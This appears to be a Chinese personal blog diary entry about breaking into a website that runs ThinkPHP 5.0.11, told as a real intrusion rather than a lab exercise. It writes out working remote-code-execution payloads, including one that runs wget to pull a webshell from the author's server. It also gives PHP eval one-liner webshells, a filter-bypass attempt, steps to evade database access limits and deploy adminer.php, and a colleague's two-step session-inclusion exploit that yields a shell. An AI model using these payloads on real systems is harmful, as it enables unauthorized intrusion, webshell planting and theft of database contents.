今天很有感触,我决定从今天开始记录我在ax的点点滴滴,自己的学长都是一步一个脚印走出来,加油,阿鑫。
首先进入网站,xxxx/ 随便输入xxx/admin 然后报错
然后去网上搜索tp5.0.11的exp打,然后找了一个exp,这tm不直接渗透结束?
然后看了一下函数,禁止了system,assert函数
这里再附上几个exp,如果没有禁,可以直接打,
_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
然后我就用了宁外一个exp
wget自己的vps下马,
http://5.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=exec&vars[l][]=wget%20https://vps//fw.php
这里我也记一下自己彩的坑,tp5常用的模块 portal index admin user captcha 这几个 当时一直报错没有此模块
然后第二个最开始我用的curl下载,下了半天也没有反应,才知道curl被禁了
终于下好了,最开下的txt,能访问,然后下的phpinfo,也能访问,最后下一句话,出问题了,有waf,写不进去
然后自己分析一波,发现<>被转义了,换
<?php @eval($_POST['cai']);?> 然后就是这这样构造去写小马,
\<\?php eval(\$\_POST\[cai\]); 还是连不上
然后我就去找卿师傅要了一个马,在此谢谢卿师傅。成功连上拿下shell
然后查看数据库,却发现连接不上,应该是做了限制,然后去修改文件,绕过限制
1.在host /etc/hosts 文件里映射一个vps的服务器地址
2.在my.conf文件里 /etc/my.conf /etc/mysql/my.conf 写入skip-name-resolve此注释socket=/var下面
却发现自己的权限不够,提权没有必要,主要是太菜了,然后就去下了一个adminer.php
最开始死活也登不上去,后来机灵了一下,决定不要放到根目录,果然,拿下
最后问了下旁边的同事,他告诉我,其实php7可以日志shell,我不信,结果10分钟搞定了,看了一下时间,中午12点,网易云时间到了
附上同事的exp
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1
_method=__construct&method=get&filter[]=think\__include_file&get[]=/tmp/sess_test1&server[]=1&x=
2步,直接拿下